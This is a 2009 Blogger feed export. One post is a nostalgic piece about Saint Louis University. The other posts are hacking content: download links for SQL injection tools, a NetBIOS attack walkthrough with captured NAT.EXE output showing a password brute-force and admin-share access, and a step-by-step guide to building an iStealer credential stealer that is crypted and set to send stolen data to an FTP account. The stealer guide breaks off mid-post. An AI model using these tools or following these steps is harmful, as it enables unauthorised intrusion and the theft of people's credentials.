tag:blogger.com,1999:blog-34811692227278963252024-03-13T04:11:05.968-07:00Pinoypinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.comBlogger16125tag:blogger.com,1999:blog-3481169222727896325.post-90453836563033540622009-11-13T18:54:00.000-08:002009-11-13T19:36:45.876-08:00Saint Louis University<div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoBoNjORa2k19imkgTG0f8L-1mVYoXat_95gNMwQ5JyHhsv2jR4Ni_Z556IB5sODtvH9PxaPSy14N4vt83aUwGWxY9EqtW6f5ah6sCgMa2U9DkeOd2-shX-YcAsEinxu6TkBC0YlP1/s1600-h/Vath_by_reveeD.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 274px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoBoNjORa2k19imkgTG0f8L-1mVYoXat_95gNMwQ5JyHhsv2jR4Ni_Z556IB5sODtvH9PxaPSy14N4vt83aUwGWxY9EqtW6f5ah6sCgMa2U9DkeOd2-shX-YcAsEinxu6TkBC0YlP1/s320/Vath_by_reveeD.jpg" alt="" id="BLOGGER_PHOTO_ID_5403797608452463586" border="0" /></a><span style="color: rgb(255, 153, 0);font-size:78%;" >Charles VATH Building<br /><ang></span><br /><br /></div><span style="font-weight: bold; color: rgb(255, 255, 153);">i'm yet a little too far leaving this University.</span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">but memoirs makes me feel sad everytime it flashes back to my mind.</span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">soon i'll be in another place far from here.</span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">friends will soon have their own lives, that it'll come to a point that nobody among them will remember the past.</span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">they'll have their own families, children, new friends.</span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">and everytime i think of it, it's like a punch in the heart.</span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">Yes, nothing will remain the same.</span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">maybe or may not, in the future, our path will cross again, i'm hoping to hear those sweet hi's and hello's like what we did before. </span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">i'll be glad to see those smiles i've seen when we first met.</span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">yes, past is past, and no, we should not forget but make it as history.</span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">that one time in our life, we experienced each other.</span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">that one time in our life, we share our thoughts with a stranger that soon became our friend.</span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">that one time in our life, we cried, laughed, and acted like crazy in one place.</span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">that one time in our life, we met somebody.</span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">IN A PERFECT PLACE where we were destined to be..</span><br /><span style="font-weight: bold; color: rgb(255, 255, 153);">I LOVE SAINT LOUIS UNIVERSITY</span><br /><br /><br /><span style="font-weight: bold; color: rgb(255, 255, 153);"> </span>pinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0tag:blogger.com,1999:blog-3481169222727896325.post-30862143232790285222009-10-19T01:34:00.001-07:002009-10-19T01:34:51.588-07:00Introduce the best SQL injection Tools<div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span style="font-family: 'Courier New';"><span style="font-size: 8pt; line-height: 11px;"><span style="color: rgb(132, 132, 132);"><span style="color: gray;"><span style="font-size: 12pt; line-height: 16px;"><span style="font-family: 'Lucida Console';"><span>According to my experiences, I think these are good tools for <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">SQL injection</span> :</span></span></span></span></span></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span style="font-family: 'Courier New';"><span style="font-size: 8pt; line-height: 11px;"><span style="color: rgb(132, 132, 132);"><span style="color: gray;"><span style="font-size: 12pt; line-height: 16px;"><span style="font-family: 'Lucida Console';"><br />ADSQL</span></span></span></span></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span style="font-family: 'Courier New';"><span style="font-size: 8pt; line-height: 11px;"><span style="color: rgb(132, 132, 132);"><span style="color: gray;"><span style="font-size: 12pt; line-height: 16px;"><span style="font-family: 'Lucida Console';"><br /><span><span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 16px; font-weight: 400; font-style: normal; font-family: 'Lucida Console';" class="IL_LINK_STYLE">Code</span>: </span></span></span></span></span></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span style="font-family: 'Courier New';"><span style="font-size: 8pt; line-height: 11px;"><span style="color: rgb(132, 132, 132);"><span style="color: gray;"><span style="font-size: 12pt; line-height: 16px;"><span style="font-family: 'Lucida Console';"><a href="http://rapidshare.com/files/112451434/AD_V2.32.rar" target="_blank" style="background-color: transparent; color: rgb(255, 204, 0); text-decoration: none;">http://rapidshare.com/files/112451434/AD_V2.32.rar</a><br /><a href="http://rapidshare.com/files/112453410/how_to_find_injection_points.rar" target="_blank" style="background-color: transparent; color: rgb(255, 204, 0); text-decoration: none;">http://rapidshare.com/files/112453410/how_...tion_points.rar</a> </span></span></span></span></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span class="Apple-style-span" style="font-family: 'Lucida Console'; font-size: 130%; color: rgb(128, 128, 128);"><span class="Apple-style-span" style="font-size: 16px; line-height: 16px;"><br /></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span style="font-family: 'Courier New';"><span style="font-size: 8pt; line-height: 11px;"><span style="color: rgb(132, 132, 132);"><span style="color: gray;"><span style="font-size: 12pt; line-height: 16px;"><span style="font-family: 'Lucida Console';">CASI 4.0</span></span></span></span></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span style="font-family: 'Courier New';"><span style="font-size: 8pt; line-height: 11px;"><span style="color: rgb(132, 132, 132);"><span style="color: gray;"><span style="font-size: 12pt; line-height: 16px;"><span style="font-family: 'Lucida Console';"><span><span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Code</span>: </span><a href="http://rapidshare.com/files/112451002/CASI_4.0.rar" target="_blank" style="background-color: transparent; color: rgb(255, 204, 0); text-decoration: none;">http://rapidshare.com/files/112451002/CASI_4.0.rar</a> </span></span></span></span></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span class="Apple-style-span" style="font-family: 'Lucida Console'; font-size: 130%; color: rgb(128, 128, 128);"><span class="Apple-style-span" style="font-size: 16px; line-height: 16px;"><br /></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span class="Apple-style-span" style="font-family: 'Lucida Console'; font-size: 130%; color: rgb(128, 128, 128);"><span class="Apple-style-span" style="font-size: 16px; line-height: 16px;"><br /></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span class="Apple-style-span" style="font-family: 'Lucida Console'; font-size: 130%; color: rgb(128, 128, 128);"><span class="Apple-style-span" style="font-size: 16px; line-height: 16px;"><br /></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span style="font-family: 'Courier New';"><span style="font-size: 8pt; line-height: 11px;"><span style="color: rgb(132, 132, 132);"><span style="color: gray;"><span style="font-size: 12pt; line-height: 16px;"><span style="font-family: 'Lucida Console';">HDSI</span></span></span></span></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span style="font-family: 'Courier New';"><span style="font-size: 8pt; line-height: 11px;"><span style="color: rgb(132, 132, 132);"><span style="color: gray;"><span style="font-size: 12pt; line-height: 16px;"><span style="font-family: 'Lucida Console';"><br /><span><span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Code</span>: </span></span></span></span></span></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span class="Apple-style-span" style="color: rgb(128, 128, 128); font-family: 'Lucida Console'; font-size: 16px; line-height: 16px;"><a href="http://rapidshare.com/files/112376888/HDSI13.rar" target="_blank" style="background-color: transparent; color: rgb(255, 204, 0); text-decoration: none;">http://rapidshare.com/files/112376888/HDSI13.rar</a></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span style="font-family: 'Courier New';"><span style="font-size: 8pt; line-height: 11px;"><span style="color: rgb(132, 132, 132);"><span style="color: gray;"><span style="font-size: 12pt; line-height: 16px;"><span style="font-family: 'Lucida Console';"><br /><a href="http://rapidshare.com/files/112610950/hdsi30.rar" target="_blank" style="background-color: transparent; color: rgb(255, 204, 0); text-decoration: none;">http://rapidshare.com/files/112610950/hdsi30.rar</a> </span></span></span></span></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span class="Apple-style-span" style="font-family: 'Lucida Console'; font-size: 130%; color: rgb(128, 128, 128);"><span class="Apple-style-span" style="font-size: 16px; line-height: 16px;"><br /></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span style="font-family: 'Courier New';"><span style="font-size: 8pt; line-height: 11px;"><span style="color: rgb(132, 132, 132);"><span style="color: gray;"><span style="font-size: 12pt; line-height: 16px;"><span style="font-family: 'Lucida Console';">pangolin v1.3.1.650</span></span></span></span></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span class="Apple-style-span" style="font-family: 'Lucida Console'; font-size: 130%; color: rgb(128, 128, 128);"><span class="Apple-style-span" style="font-size: 16px; line-height: 16px;"><br /></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span style="font-family: 'Courier New';"><span style="font-size: 8pt; line-height: 11px;"><span style="color: rgb(132, 132, 132);"><span style="color: gray;"><span style="font-size: 12pt; line-height: 16px;"><span style="font-family: 'Lucida Console';"><span><span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Code</span>: </span></span></span></span></span></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span style="font-family: 'Courier New';"><span style="font-size: 8pt; line-height: 11px;"><span style="color: rgb(132, 132, 132);"><span style="color: gray;"><span style="font-size: 12pt; line-height: 16px;"><span style="font-family: 'Lucida Console';"><a href="http://www.anonym.to/?http://www.nosec.org/projects/pangolin_bin.rar" target="_blank" style="background-color: transparent; color: rgb(255, 204, 0); text-decoration: none;">http://www.nosec.org/projects/pangolin_bin.rar</a><br /><a href="http://www.anonym.to/?http://seclab.nosec.org/pangolin_bin.rar" target="_blank" style="background-color: transparent; color: rgb(255, 204, 0); text-decoration: none;">http://seclab.nosec.org/pangolin_bin.rar</a><br /><a href="http://www.anonym.to/?http://www.nosec.org/web/index.php?q=pangolin" target="_blank" style="background-color: transparent; color: rgb(255, 204, 0); text-decoration: none;">http://www.nosec.org/web/index.php?q=pangolin</a> </span></span></span></span></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span class="Apple-style-span" style="font-family: 'Lucida Console'; font-size: 130%; color: rgb(128, 128, 128);"><span class="Apple-style-span" style="font-size: 16px; line-height: 16px;"><br /></span></span></div><div class="postcolor" id="post-106267" style="font-size: 12px; line-height: 19px;"><span style="font-family: 'Courier New';"><span style="font-size: 8pt; line-height: 11px;"><span style="color: rgb(132, 132, 132);"><span style="color: gray;"><span style="font-size: 12pt; line-height: 16px;"><span style="font-family: 'Lucida Console';">NBSI<br /><span><span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Code</span>: </span><a href="http://hackbase.com/soft/down.php?downid=15799&id=0" target="_blank" style="background-color: transparent; color: rgb(255, 204, 0); text-decoration: none;">http://hackbase.com/soft/down.php?downid=15799&id=0</a> </span></span></span></span></span></span></div>pinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0tag:blogger.com,1999:blog-3481169222727896325.post-82569423443825986422009-10-19T01:27:00.000-07:002009-10-19T01:31:55.129-07:00NetBIOS Attack Methods<span><span>This NetBIOS attack technique was verified on <span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 11px; font-weight: 400; font-style: normal; font-family: Verdana,Arial,sans-serif;" class="IL_LINK_STYLE">Windows 95</span>, NT 4.0 Workstation, NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, </span><span style="text-decoration: underline; color: rgb(0, 153, 0); font-size: 11px; font-weight: 400; font-style: normal; font-family: Verdana,Arial,sans-serif;" class="IL_LINK_STYLE">Windows 98</span> beta 2.1. One of the components being used is NAT.EXEA discussion of the tool, it switches, and common techniques follows:</span><br /><br />NAT.EXE [-o filename] [-u userlist] [-p passlist] <address><br /><br />Switches:<br /><br />-o Specify the output file. All results from the scan<br />will be written to the specified file, in addition<br />to standard output.<br />-u Specify the file to read usernames from. Usernames<br />will be read from the specified file when attempt-<br />ing to guess the password on the remote server.<br />Usernames should appear one per line in the speci-<br />fied file.<br />-p Specify the file to read passwords from. Passwords<br />will be read from the specified file when attempt-<br />ing to guess the password on the remote server.<br />Passwords should appear one per line in the speci-<br />fied file.<br /></address><br />Addresses should be specified in comma deliminated<br />format, with no spaces. Valid address specifica-<br />tions include:<br />hostname - "hostname" is added<br />127.0.0.1-127.0.0.3, adds addresses 127.0.0.1<br />through 127.0.0.3<br />127.0.0.1-3, adds addresses 127.0.0.1 through<br />127.0.0.3<br />127.0.0.1-3,7,10-20, adds addresses 127.0.0.1<br />through 127.0.0.3, 127.0.0.7, 127.0.0.10 through<br />127.0.0.20.<br />hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1<br />through 127.0.0.1<br />All combinations of hostnames and address ranges as<br />specified above are valid.<br /><br />[8.0.1] Comparing NAT.EXE to Microsoft's own executables<br /><br />[8.0.2] First, a look at NBTSTAT<br /><br />First we look at the NBTSTAT command. This command was discussed in earlier portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will see a demonstration of how this tool is used and how it compares to other Microsoft tools and non Microsoft tools.<br /><br />What follows is pretty much a step by step guide to using NBTSTAT as well as extra information. Again, if youre interested in more NBSTAT switches and functions, view the [5.0.6] The Nbtstat Command portion of the book.<br /><br /><br />C:\nbtstat -A XXX.XX.XXX.XX<br /><br />NetBIOS Remote Machine Name Table<br /><br />Name Type Status<br />---------------------------------------------<br />STUDENT1 <20> UNIQUE Registered<br />STUDENT1 <00> UNIQUE Registered<br />DOMAIN1 <00> GROUP Registered<br />DOMAIN1 <1c> GROUP Registered<br />DOMAIN1 <1b> UNIQUE Registered<br />STUDENT1 <03> UNIQUE Registered<br />DOMAIN1 <1e> GROUP Registered<br />DOMAIN1 <1d> UNIQUE Registered<br />..__MSBROWSE__.<01> GROUP Registered<br /><br />MAC Address = 00-C0-4F-C4-8C-9D<br /><br />Here is a partial NetBIOS 16th bit listing:<br /><br />Computername <00> UNIQUE workstation service name<br /><00> GROUP domain name<br />Server <20> UNIQUE Server Service name<br /><br />Computername <03> UNIQUE Registered by the messenger service. This is the computername<br />to be added to the LMHOSTS file which is not necessary to use<br />NAT.EXE but is necessary if you would like to view the remote<br />computer in Network Neighborhood.<br />Username <03> Registered by the messenger service.<br />Domainname <1b> Registers the local computer as the master browser for the domain<br />Domainname <1c> Registers the computer as a domain controller for the domain<br />(PDC or BDC)<br />Domainname <1d> Registers the local client as the local segments master browser<br />for the domain<br />Domainname <1e> Registers as a Group NetBIOS Name<br />Network Monitor Name<br />Network Monitor Agent<br /><06> RAS Server<br /><1f> Net DDE<br /><21> RAS Client<br /><br />[8.0.3] Intro to the NET commands<br /><br />The NET command is a command that admins can execute through a dos window to show information about servers, networks, shares, and connections. It also has a number of command options that you can use to add user accounts and groups, change domain settings, and configure shares. In this section, you will learn about these NET commands, and you will also have the outline to a NET command Batch file that can be used as a primitive network security analysis tool. Before we continue on with the techniques, a discussion of the available options will come first:<br /><br />[8.0.4] Net Accounts: This command shows current settings for password, logon limitations, and domain information. It also contains options for updating the User accounts database and modifying password and logon requirements.<br /><br />[8.0.5] Net Computer: This adds or deletes computers from a domains database.<br /><br />[8.0.6] Net Config Server or Net Config Workstation: Displays config info about the server service. When used without specifying Server or Workstation, the command displays a list of configurable services.<br /><br />[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET PAUSE command.<br /><br />[8.0.8] Net File: This command lists the open files on a server and has options for closing shared files and removing file locks.<br /><br />[8.0.9] Net Group: This displays information about group names and has options you can use to add or modify global groups on servers.<br /><br />[8.1.0] Net Help: Help with these commands<br /><br />[8.1.1] Net Helpmsg message#: Get help with a particular net error or function message.<br /><br />[8.1.2] Net Localgroup: Use this to list local groups on servers. You can also modify those groups.<br /><br />[8.1.3] Net Name: This command shows the names of computers and users to which messages are sent on the computer.<br /><br />[8.1.4] Net Pause: Use this command to suspend a certain NT service.<br /><br />[8.1.5] Net Print: Displays print jobs and shared queues.<br /><br />[8.1.6] Net Send: Use this command to send messages to other users, computers, or messaging names on the network.<br /><br />[8.1.7] Net Session: Shows information about current sessions. Also has commands for disconnecting certain sessions.<br /><br />[8.1.8] Net Share: Use this command to list information about all resources being shared on a computer. This command is also used to create network shares.<br /><br />[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.<br /><br />[8.2.0] Net Stop: Stops NT services, cancelling any connections the service is using. Let it be known that stopping one service, may stop other services.<br /><br />[8.2.1] Net Time: This command is used to display or set the time for a computer or domain.<br /><br />[8.2.2] Net Use: This displays a list of connected computers and has options for connecting to and disconnecting from shared resources.<br /><br />[8.2.3] Net User: This command will display a list of user accounts for the computer, and has options for creating a modifying those accounts.<br /><br />[8.2.4] Net View: This command displays a list of resources being shared on a computer. Including netware servers.<br /><br />[8.2.5] Special note on DOS and older Windows Machines: The commands listed above are available to Windows NT Servers and Workstation, DOS and older Windows clients have these NET commands available:<br /><br />Net Config<br />Net Diag (runs the diagnostic program)<br />Net Help<br />Net Init (loads protocol and network adapter drivers.)<br />Net Logoff<br />Net Logon<br />Net Password (changes password)<br />Net Print<br />Net Start<br />Net Stop<br />Net Time<br />Net Use<br />Net Ver (displays the type and version of the network redirector)<br />Net View<br /><br />For this section, the command being used is the NET VIEW and NET USE commands.<br /><br />[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.<br /><br />C:\net view XXX.XX.XXX.XX<br /><br />Shared resources at XXX.XX.XXX.XX<br /><br />Share name Type Used as Comment<br /><br />------------------------------------------------------------------------------<br />NETLOGON Disk Logon server share<br />Test Disk<br />The command completed successfully.<br /><br />NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.<br /><br /><br />C:\net use /?<br /><br />The syntax of this command is:<br /><br />NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]<br />[/USER:[domainname\]username]<br />[[/DELETE] | [/PERSISTENT:{YES | NO}]]<br /><br />NET USE [devicename | *] [password | *]] [/HOME]<br /><br />NET USE [/PERSISTENT:{YES | NO}]<br /><br />C:\net use x: \\XXX.XX.XXX.XX\test<br /><br />The command completed successfully.<br /><br />C:\unzipped\nat10bin>net use<br /><br />New connections will be remembered.<br /><br />Status Local Remote Network<br /><br />-------------------------------------------------------------------------------<br />OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network<br />OK \\XXX.XX.XXX.XX\test Microsoft Windows Network<br /><br />The command completed successfully.<br /><br />Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.<br /><br />C:\nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY<br /><br /><br />[*]--- Reading usernames from userlist.txt<br />[*]--- Reading passwords from passlist.txt<br /><br />[*]--- Checking host: XXX.XX.XXX.XX<br />[*]--- Obtaining list of remote NetBIOS names<br /><br />[*]--- Attempting to connect with name: *<br />[*]--- Unable to connect<br /><br />[*]--- Attempting to connect with name: *SMBSERVER<br />[*]--- CONNECTED with name: *SMBSERVER<br />[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03<br />[*]--- Server time is Mon Dec 01 07:44:34 1997<br />[*]--- Timezone is UTC-6.0<br />[*]--- Remote server wants us to encrypt, telling it not to<br /><br />[*]--- Attempting to connect with name: *SMBSERVER<br />[*]--- CONNECTED with name: *SMBSERVER<br />[*]--- Attempting to establish session<br />[*]--- Was not able to establish session with no password<br />[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'<br />[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'<br /><br />[*]--- Obtained server information:<br /><br />Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]<br /><br />[*]--- Obtained listing of shares:<br /><br />Sharename Type Comment<br />--------- ---- -------<br />ADMIN$ Disk: Remote Admin<br />C$ Disk: Default share<br />IPC$ IPC: Remote IPC<br />NETLOGON Disk: Logon server share<br />Test Disk:<br /><br />[*]--- This machine has a browse list:<br /><br />Server Comment<br />--------- -------<br />STUDENT1<br /><br /><br />[*]--- Attempting to access share: \\*SMBSERVER\<br />[*]--- Unable to access<br /><br />[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$<br />[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$<br />[*]--- Checking write access in: \\*SMBSERVER\ADMIN$<br />[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$<br />[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$<br /><br />[*]--- Attempting to access share: \\*SMBSERVER\C$<br />[*]--- WARNING: Able to access share: \\*SMBSERVER\C$<br />[*]--- Checking write access in: \\*SMBSERVER\C$<br />[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$<br />[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$<br /><br />[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON<br />[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON<br />[*]--- Checking write access in: \\*SMBSERVER\NETLOGON<br />[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON<br /><br />[*]--- Attempting to access share: \\*SMBSERVER\Test<br />[*]--- WARNING: Able to access share: \\*SMBSERVER\Test<br />[*]--- Checking write access in: \\*SMBSERVER\Test<br />[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test<br /><br />[*]--- Attempting to access share: \\*SMBSERVER\D$<br />[*]--- Unable to access<br /><br />[*]--- Attempting to access share: \\*SMBSERVER\ROOT<br />[*]--- Unable to access<br /><br />[*]--- Attempting to access share: \\*SMBSERVER\WINNT$<br />[*]--- Unable to access<br /><br />If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If not, keep playing. You will be surprised what you find outpinoyhttp://www.blogger.com/profile/06210064855427034777noreply@blogger.com0tag:blogger.com,1999:blog-3481169222727896325.post-80819674310864669172009-10-19T01:06:00.000-07:002009-10-19T01:25:44.447-07:00The easiest method of hacking<span class="Apple-style-span" style="line-height: 19px;font-family:Verdana,Tahoma,Arial,'Trebuchet MS',sans-serif,Georgia,Courier,'Times New Roman',serif;font-size:12;" >What you will need for this tutorial - (CLICK THE WORDS)<br /><a href="http://rapidshare.com/files/243255040/iStealer.rar" target="_blank" style="background-color: transparent; text-decoration: none;"><span class="Apple-style-span" style="color: rgb(0, 0, 255);">1.ISTEALER 3.0</span></a><br /><a href="http://uploading.com/files/V7JHVIM5/BRMCrypt_1.4_Upload_By_BarCode.rar.html" target="_blank" style="background-color: transparent; text-decoration: none;"><span class="Apple-style-span" style="color: rgb(0, 0, 255);">2.CRYPTER</span></a><br /><a href="http://www.drivehq.com/secure/FreeSignup.aspx?from=storage" target="_blank" style="background-color: transparent; text-decoration: none;"><span class="Apple-style-span" style="color: rgb(0, 0, 255);">3.DRIVEHQ ACCOUNT</span></a><br /><br />all UPLOADS contain the same password.<br /><span>Password <span class="IL_SPAN"><input name="IL_MARKER" type="hidden">Code</span>:</span><br />barcode@inwarez.org<br /><br />Step 1:<br />Click the "Drivehq Account" link above, fill in the blank spaces with proper details as you will have to verify the account. Create the account and verify it, write down the details for later reference.<br /><br />Step 2:<br />Click the "iStealer 3.0" link above. Download the .zip to a folder or your desktop.<br /><br /></span><span class="Apple-style-span" style="line-height: 19px;font-family:Verdana,Tahoma,Arial,'Trebuchet MS',sans-serif,Georgia,Courier,'Times New Roman',serif;font-size:12;" >Step 3:<br />Extract the folder to your desktop, you will be prompted for a password, that can be found below.<br />Password: barcode@inwarez.org<br /><br /></span><span style="font-weight: bold;"><span class="Apple-style-span" style="font-family:Verdana,Tahoma,Arial,'Trebuchet MS',sans-serif,Georgia,Courier,'Times New Roman',serif;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style=""><span class="Apple-style-span" style="color: rgb(255, 255, 204);font-size:12;" ><span class="Apple-style-span" style="color: rgb(0, 0, 0);">Step 4:<br />Open the folder, inside you will find a subfolder and the iStealer executable program. Open the .exe.<br />Fill in the blanks with the information of your drivehq account you made earlier, make sure the same boxes are ticked and leave the black area alone.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk6bIRpBC9iYjE5__l39a9XIcwLutmbVGIF0ypVAJXFZY1q-0oLlsp-i7snV6_SDWicGwE_jP-wRJsk8GKeRmVrUpkFvBNsn410lV55Y54fO6-Dpe638D69Bsgb-TaMExPZt6P57GE/s1600-h/53469419.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 310px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk6bIRpBC9iYjE5__l39a9XIcwLutmbVGIF0ypVAJXFZY1q-0oLlsp-i7snV6_SDWicGwE_jP-wRJsk8GKeRmVrUpkFvBNsn410lV55Y54fO6-Dpe638D69Bsgb-TaMExPZt6P57GE/s320/53469419.png" alt="" id="BLOGGER_PHOTO_ID_5394222018616111234" border="0" /></a></span></span></span></span></span></span></span><span style="font-weight: bold;"><span class="Apple-style-span" style="font-family:Verdana,Tahoma,Arial,'Trebuchet MS',sans-serif,Georgia,Courier,'Times New Roman',serif;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style=""><span class="Apple-style-span" style="color: rgb(255, 255, 204);font-size:12;" ><span class="Apple-style-span" style="color: rgb(0, 0, 0);">Step 5:<br />Once your FTP details are filled in, click the "Test FTP" button.<br /><br /><br /></span></span></span></span></span></span></span><span style="font-weight: bold;"><span class="Apple-style-span" style="font-family:Verdana,Tahoma,Arial,'Trebuchet MS',sans-serif,Georgia,Courier,'Times New Roman',serif;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style=""><span class="Apple-style-span" style="color: rgb(255, 255, 204);font-size:12;" ><span class="Apple-style-span" style="color: rgb(0, 0, 0);"><br /></span></span></span></span></span></span></span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyxq9uZH0ff6jUM0GJyGcCarYcJrvaMUjjoKz32fcxqPL9UOdpPe6oi7NBF4u0WYDuJrvwaaUH93cvjJiJuCUZ6tEizAe7gIE-tMDqJOFDg3yhTlWmNSHKSg2-__6WtaiV4WKI6vc1/s1600-h/35465187.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 313px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyxq9uZH0ff6jUM0GJyGcCarYcJrvaMUjjoKz32fcxqPL9UOdpPe6oi7NBF4u0WYDuJrvwaaUH93cvjJiJuCUZ6tEizAe7gIE-tMDqJOFDg3yhTlWmNSHKSg2-__6WtaiV4WKI6vc1/s320/35465187.png" alt="" id="BLOGGER_PHOTO_ID_5394222735785967058" border="0" /></a><span style="font-weight: bold;"><span class="Apple-style-span" style="font-family:Verdana,Tahoma,Arial,'Trebuchet MS',sans-serif,Georgia,Courier,'Times New Roman',serif;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" style="font-weight: normal;"><span class="Apple-style-span" style=""><span class="Apple-style-span" style="color: rgb(255, 255, 204);font-size:12;" ><span class="Apple-style-span" style="color: rgb(0, 0, 0);">Step 6:<br />If your FTP is working fine then continue to build the iStealer server by pressing the "Build" button, you will be prompted to save the file. Save it to your desktop, name it whatever you want. If your FTP test was not successfull then please check the details and try again, alternatively post here.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiav-4Gqw0hfD4ua5cRqxh-XxzY6AIj56ZsQoEHHIcRmTJwVVymhu6cUkhRdSz59hJ8TxVUaC9ciQDcNiXcncwFxiZD2RQqIGknPp1UNNFFLt4Ag0nxhwFDmAr5yLHnKi5XiTEKGv0A/s1600-h/51186364.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 311px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiav-4Gqw0hfD4ua5cRqxh-XxzY6AIj56ZsQoEHHIcRmTJwVVymhu6cUkhRdSz59hJ8TxVUaC9ciQDcNiXcncwFxiZD2RQqIGknPp1UNNFFLt4Ag0nxhwFDmAr5yLHnKi5XiTEKGv0A/s320/51186364.png" alt="" id="BLOGGER_PHOTO_ID_5394222577264233346" border="0" /></a></span></span></span></span></span></span></span><span style="font-weight: bold;"><span class="Apple-style-span" style="font-family:Verdana,Tahoma,Arial,'Trebuchet MS',sans-serif,Georgia,Courier,'Times New Roman',serif;"><span class="Apple-style-span" style="line-height: 19px;"><span class="Apple-style-span" 